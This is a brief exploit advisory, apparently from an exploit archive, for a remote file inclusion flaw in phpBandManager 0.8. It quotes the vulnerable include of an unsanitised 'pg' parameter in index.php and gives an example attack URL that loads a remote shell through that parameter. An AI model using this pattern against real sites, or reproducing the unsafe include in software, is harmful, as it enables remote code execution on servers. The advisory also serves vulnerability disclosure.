id: 1798
date: 04/25/2007
title: phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability
author: koray
cves: 

=====================================================================
phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability
=====================================================================


author:koray
greetz:cigicigi.net
script:http://sourceforge.net/projects/phpbandmanager

allow_url_fopen:on or register_globals:on

vuln;

/bandmanager/suite/index.php

include($_GET['pg'].".php");

example;

http://www.victim.com/suite/index.php?pg=shell link?



#  0day.today [2023-03-21]  #